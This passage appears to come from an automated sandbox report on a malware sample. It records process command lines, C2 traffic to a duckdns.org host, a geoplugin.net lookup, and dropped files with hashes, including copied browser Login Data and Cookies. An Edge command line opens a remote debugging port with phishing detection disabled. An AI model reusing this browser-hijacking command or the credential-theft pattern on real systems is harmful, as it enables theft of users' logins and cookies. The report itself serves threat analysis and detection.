"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2000,1526538760488115909,95538217086833128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.16.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 13hindi4pistatukoy4tra.duckdns.org udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 79.18.216.154.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.234:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 142.250.187.234:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/4528-4-0x00007FF9D9553000-0x00007FF9D9555000-memory.dmp

memory/4528-5-0x0000026BEA090000-0x0000026BEA0B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjxnantl.iq5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4528-15-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp

memory/4528-16-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp

memory/4528-19-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp

memory/4528-20-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp

memory/4528-23-0x00007FF9D9550000-0x00007FF9DA011000-memory.dmp

memory/1468-24-0x0000000002B50000-0x0000000002B86000-memory.dmp

memory/1468-25-0x0000000005520000-0x0000000005B48000-memory.dmp

memory/1468-26-0x0000000005BB0000-0x0000000005BD2000-memory.dmp

memory/1468-27-0x0000000005C50000-0x0000000005CB6000-memory.dmp

memory/1468-28-0x0000000005CC0000-0x0000000005D26000-memory.dmp

memory/1468-38-0x0000000005DF0000-0x0000000006144000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f58e73a5c43b0713d39bb6cca4251670
SHA1 ece141754053a0d3855b7270a9569601e99dbbf6
SHA256 f374315ca436a4f0505cdc56d043e1176df91064603a38001902cf596262d015
SHA512 1872b460e63288eabd785e10c76ee0b35bb9c37891193ad4ac0992e37f2fd6d9e692cea26ceec58b219b892910825e80d8e009c161d36735eb1dd839d4622ee8

memory/1468-40-0x0000000006440000-0x000000000645E000-memory.dmp

memory/1468-41-0x0000000006460000-0x00000000064AC000-memory.dmp

memory/1468-42-0x0000000007C20000-0x000000000829A000-memory.dmp

memory/1468-43-0x00000000075A0000-0x00000000075BA000-memory.dmp

memory/1468-44-0x0000000007690000-0x0000000007726000-memory.dmp

memory/1468-45-0x0000000007640000-0x0000000007662000-memory.dmp

memory/1468-46-0x0000000008850000-0x0000000008DF4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Overballast.Van

MD5 d7b88800546dce0f4e1f1df0c00bbd38
SHA1 e36f1565ded075365e68dd93ae93b63b24882325
SHA256 29bec0378c0caadfb30794b545b50f3498631248f06dbfce7d4ae233737a5535
SHA512 173192d430f26a32a4a52d0d9be716cbc75ed6dd5d22b8eb53ba6553d683c700115f48897d330f97f687a35287c9a943bed2299f26357d980568ede8708a3feb

memory/1468-48-0x0000000008E00000-0x000000000C9DA000-memory.dmp

memory/2400-62-0x0000000000A00000-0x0000000001C54000-memory.dmp

memory/2400-63-0x0000000000A00000-0x0000000001C54000-memory.dmp

memory/2400-69-0x00000000214E0000-0x0000000021514000-memory.dmp

memory/2400-73-0x00000000214E0000-0x0000000021514000-memory.dmp

memory/2400-72-0x00000000214E0000-0x0000000021514000-memory.dmp

memory/2424-79-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 8d8dcad3d6137a36506f5aaf6e19b4ce
SHA1 dd97f59dc37f5c1f853a0a6d5acde8742f3d63e5
SHA256 c809f4286da7aedf166b2acc34f6101f3095dbfe2453620592db0948b18110cc
SHA512 d150fa593bf1f8f27cff617251d7a90a91ddb16efdf5c3f1c093e80d5249aa1953b33ef9ced7552fe7ea00437297c02217eaa95990e7bb4a66e9f3d715b4b5b7

memory/2424-83-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2424-81-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4448-85-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2424-88-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3764-93-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3764-89-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4448-87-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3764-86-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4448-84-0x0000000000400000-0x0000000000462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 ebc04efe08c5b479d966dcc4098ad9fd
SHA1 982c038afc8f5c796145ad9f244dd630ed49ed85
SHA256 0cff7fb1fa385668dd0006c0ae569a42ade53e94f948aef3092a176482374144
SHA512 a8d8f13c25f0c8c3e2576043c84aa4224a188483dcef98d8edb9bc0c83d4232e74e444aba2565a7c76192fc3ad71de2ed4c6b9ec68426f16eee788d065bf143b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 6f27555cbe1a0d786558e04566b4bd53
SHA1 b3790bb9baebbb92d6bd2bfb02fbc8a6b68af0dc
SHA256 bb549aab3a1d4cce89d5fb044da67fd592a287bc9d7ad47ac37dd79c89a4fb1d
SHA512 03a620524476d336e391e56bed9cf060588bd7421ccc7fe07dfd328748c8587f04be8f8db56587a237df9f483e9c85f4455f9f1483595b8c8289dcdae1838a2a

\??\pipe\crashpad_2548_TTDXIHQAUTMNNLZD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

memory/2400-153-0x0000000022010000-0x0000000022029000-memory.dmp

memory/2400-152-0x0000000022010000-0x0000000022029000-memory.dmp

memory/2400-149-0x0000000022010000-0x0000000022029000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mjefag

MD5 ac300aeaf27709e2067788fdd4624843
SHA1 e98edd4615d35de96e30f1a0e13c05b42ee7eb7b
SHA256 d2637d58bb120dc6fefe2f38d6e0d4b308006b8639106a7f9e915fa80b5cc9d9
SHA512 09c46e708f9d253dccd4d943639d9f8126f868ae3dcd951aad12222bb98b5d3814676f878c8391b9bdab5dedcf5b9e9eaeb2ad3ffec57bda875198735586d4df

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 27fd94e525bf74864e40da4b3612eeb8
SHA1 c596943624798eb96ae067548305c01691eee6e6
SHA256 05dde8e3836eeb31fdac7a0cc3da644b502fe299c85eb00b4423f1dfe9fdcb91
SHA512 78425b52a1be542797d6f8d2a4971a40a962acf5d090daa546816916c815f2e21445636cf51839cce0fa9a8fab572ee8eda83b7a7226d3b8b795641fa91e8def

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 317d044f50c669a8fa12b4f766cc5f71
SHA1 f47318c99da5e580611514ffbc844e6909fb716c
SHA256 e5805654720245bae000c07d5e977991257740d84fe8db6a141fb0640bd146e7
SHA512 7744658f4cf747ec2baf5ee0e495acb71b2521ee16b07f022ea4e44221edacb4efab849e5fafc032a8ed952b5c3c21f6ecca7c93a1ae1cef8bffcf0ce396dfa7

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 5f4873669d1ab040e423ad87bedabdf4
SHA1 9fe2d68f8264bc3e52aa068d8c9e9f748705698a
SHA256 ec7ba41e513cd3d49d52b23d42533e8f5e674d5d9fa3fc55fc40c2b95b425096
SHA512 7fdfb9d8dfd1ac26ecc4522cd0aaf6283134dbd5b348ef9110d57b0fed3f2e00ea4a16a452a54834d3af6efea8ffff5e7a1ca633daae2d3b50a0242762248440

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 3d2d0e92d8a651c6ab2ff89573cb2387
SHA1 1733247e71238ceb6283601fa4bca11c657815f5
SHA256 66e59a07892dcef395d533d84d972c6e56771b6976c8e8c3699d20d68fc4bf1e
SHA512 37580d77090173b78f011b5fc50847a7bd68c847659079a846b8dcb4b78c689af3373b0713ee3c0a970b54649b0b967475a751bf203a9fa310b8b5eaf1aa6491

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

MD5 ba1cc5b1a7fa41db1806bc12d9e06a65
SHA1 0003bfbf59f6b96db8e83a0cc7f121164b12bbe2
SHA256 50cd13b1c040460b134258014c1ee4b5290a7456653972c9db58db07528440b6
SHA512 2f352d4c9fd2f1c19e4809397966d5ce40b4ea06ba5a580e4cf7cd82757de6f3056a63db7505bc49b889f055ab37c6b19924a42c513b4e4f72a4e12d8d21f62c

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

MD5 ae8580357c8254e846ab8598e556792d
SHA1 0c9768c08a055e3d5c505b49df2586e0bcc8f07e
SHA256 3c00e626112a3a424d0167280a62586ad0e4575d257962a8d82addecb35d97c6
SHA512 f4675be906a7fb00f2b9d9c1f57d71e9535cb14f82955324a4a441afeecbde4f424f58c87e2a954d7a7263a2d0f6ec911bbaea9d32688a7d5b641eed693c6cfd

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

MD5 d30bfa66491904286f1907f46212dd72
SHA1 9f56e96a6da2294512897ea2ea76953a70012564
SHA256 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907
SHA512 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 a23a1ccd6edf23104620f1bb9f4f547b
SHA1 2078abb42cc2ad96d3cbb00b876bda35af59859c
SHA256 b40c1227d466f7c9bd96b3cf26dfc63ea43427cc4f0515fa346332f4ff5cd7b1
SHA512 6d2f9d8292e7f3bc0e099d14b1487940233d27d4849a5756cb2d0f1bc51afba0d7f1c5b3cb8ef9913b22ec138a1759abc26497aa936e67023b73a7a6396483e2

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

MD5 c35ba8876d1932d40ef0961d656f473e
SHA1 004571bf1d1da9b87c399af9bffd8004ad0668c9
SHA256 460344459d94034aeab7300abf5fe4d687b682538e9ab24e21249662534a0b16
SHA512 f5c871b6b00e97f3a6cc2f6f1ec7a07c5edb18ef822193025d042bd36c3de20a851eee223cbe1223d74348f33ffebaf3c9f4a2e71af70b31cd3cd393dc46a700

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 72fb8fdc79e886886d9cc89b88ef11db
SHA1 b602840b49b5e657eb4f9cab689940c94179ebc4
SHA256 623fb553bc909b8b591b994a232f3361b993a75d89d3374fa433af91ce63dfea
SHA512 0ac23f265781a01f7ab0434e4dbb9e1af441cd0227d317af3f9ab436a44585321b209e167bbabc7461e28407dde3ba3519d67c44d6f1762ad0fa4f151dd82f92

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 03f5b0d0cde36047423d3f5744da6aec
SHA1 76afd3c804078639efd8db85925aaff22cd7eabd
SHA256 9047f92d0844c71ca1e579e82ac66980b998ea13606175c4094b37dd4c515745
SHA512 b4958125b5bda3be2b898ea7cf4580c82585f41ebdfb8859575dfc0bdd851cd206d12c268bfe2b0cd29b3a32415c012a03040a17800c14ce525188be61def59f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

MD5 b40e1be3d7543b6678720c3aeaf3dec3
SHA1 7758593d371b07423ba7cb84f99ebe3416624f56
SHA256 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4
SHA512 fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

MD5 986962efd2be05909f2aaded39b753a6
SHA1 657924eda5b9473c70cc359d06b6ca731f6a1170
SHA256 d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889
SHA512 e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 32371b6dc560dd60285d3576fc66cce1
SHA1 7ecd54d19a6262ca1d90ee5858116986847f0fc4
SHA256 15f11555291d1e7d4008df75513d63267bb01589bb64c37b093881988ad83ab9
SHA512 0592e3e2d3911d2d87d738132168bdf1a127258e4aa893936afcf70078d938697d1d104cb38fb8fddcdd9a95cdefe57473cd793fbf6ca06803183eba9963ef28

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

MD5 4ba10349f3befe34968f7ca4437aafd7
SHA1 95146f48d9164d6707c146ab657cb8a6bcfe2438
SHA256 e2eac33c29c3d6c7bbc4fd7a142c372712606bad72a416da9ec7f56b3d29a83c
SHA512 844d8d3cb6d9bd1fefb905d7e7b68196ce112f80a17d4dce468bc961b431ce0a51ec2876ea98ec622d7f4abd4753edee25d62373cc9e2340120d1ac536164939

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

MD5 b8c53c17a10b518cab9452e4521fa552
SHA1 3b373f66a0171c05b4982d8d7281d782d2535f3e
SHA256 1991df4bf9aaf4368cb5bb8b3546084a58f88970d72d583c13e95a327182c4c4
SHA512 90c03bfb214631d4ecf545398944a3ada13f04f2b62adf027140bb6517fe0b93601eb0224ce0bf87f0dd7dfa0ccee30eb073d18bf4118aa84f415a8f2ba7dea6

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

MD5 d2e1ddd2f035bc9c876e6436d82211bf
SHA1 ce7a7371e89e9a2be7a998580afe8e58ded22395
SHA256 478cd2c35d6bbb003c34bb20c4f06f2d9e3eb7eceb785c22a24dbf7e5aa6d555
SHA512 09a279080c2c98db999bcc6f0f8bcbfb864b06323cd63b390170eda9f1f3c1628c22a757e2bf2bd62883d5812fd3ba6968b84fc2f04ef60837e4a59989e042fb

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

MD5 69449520fd9c139c534e2970342c6bd8
SHA1 230fe369a09def748f8cc23ad70fd19ed8d1b885
SHA256 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277
SHA512 ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

MD5 9082ba76dad3cf4f527b8bb631ef4bb2
SHA1 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0
SHA256 bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd
SHA512 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

MD5 6d7732ece43bcf0323779f12d0c7890a
SHA1 026a0d7feb5508474d70731a8a3e22035a43100d
SHA256 a6fca0d6dff89d0f7e15206dc34bb35e3bc74b8ce8a7028b87d8dd6d56065964
SHA512 59eba3b222b38007225ca30330fa84424c83d56ab9e79691c3a858ef98b9548ba90384e60b4f1c8e031b0f8a16837f5b25f8c05d0b17cbad8ba769421cc27b6c

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

MD5 9dcac77a34b127cc6ffbc9d903c200be
SHA1 dd03d3063d9447ea8ff3e56a58885ae6cf0cbeef
SHA256 695ff9680ecceb377a8c8579b53465b7ca6e8f99c71f3bf597f772b3816046ce
SHA512 64975b58eb851556ebc76184b7ae3f70c90b522aa7c243d93c871aee507b6669f9cf51159cbe91a98912632f3c8a3fa55c31d8e972801d335ce93689e6efe53f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 3295bd8de9f873108efa25a44ddc9f1c
SHA1 4118c09dca532bb55239047ee17111ffc7e737a1
SHA256 ea02816ba763cecbe154b5fdef32fef2f5187c40c0c1f9d6cb11b3f0278eb74b
SHA512 6f68a3fd12c3395f0fe219827b26f999d23d503d5522d288c929aeb4fe200237c740c9aa0d08b6492d94477c4b3cd1e1a57a3458fe7e1b9c99ad41464fa21afe

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

MD5 c022ae7c9a90a8394b7762dfbb61c674
SHA1 5344261d8517843d2f33b2d3a8228ca80a7b9e2f
SHA256 2e5f065db402f038c8b1fbf9bbc9dd987e5ba747e89676c71bd9b508b2996545
SHA512 23dcd933d0add359920286bc8225e9fa5ac14e8793a5bf90b6ab025382844214236bc0a383b5ccdb5e2c986e2781315e90c8473c7e9e6ed337d3297de05062a1

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

MD5 bfc1e625b1da2fce382b2365c773e1a6
SHA1 6a3913fb539f650e4f22c7afa1d1f5a124e37b76
SHA256 230c201941a98941edfce0eddd0d01e36d8adb52a11c1e09199796645b4432f9
SHA512 f1cc86636a0e228cde249d5d7c75fc5adef8cdf3a4bec917fac7fc49bca7e3e83868017092fae7f4e1a5aac0648ebfea43625d293ab210d2a9307f4386e5b46a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

MD5 d250f162a2d2e500b40864682605cc26
SHA1 250f25a3d167075095f0a03dc9c68908d3e40038
SHA256 e894385bc001a5d2994ce1c97f4c355f19d1cd1c805bfdc3b09fd2fac3af8cc3
SHA512 821d05d450caa0afd61c39fa8b2dbfe8d762e6e9d92cca08513868b1562e5733b9927821fbbb1f0fd2dc07c372bd1e078ed543079172115bbb06b4a8fc04339b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

MD5 5ee1acea20c641249001096ce217c7a8
SHA1 604076886f02ae2e455cc90147bb93aff28cfdbf
SHA256 22d81cf13acd5b1cec2a69a155f3c45f063b9c75f55c117c6d7d00b4db9b9f91
SHA512 214bd384dcea00b061fda4ec1a171b961670eab190d40f32412a92b73dd0d715cdeb423e10c3b38230e7f7a00ef0be6c3bcc74d1970d397c940ca9a07ba043a7

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

MD5 38fb716ea1b98ca10eb7f8c8a6002796
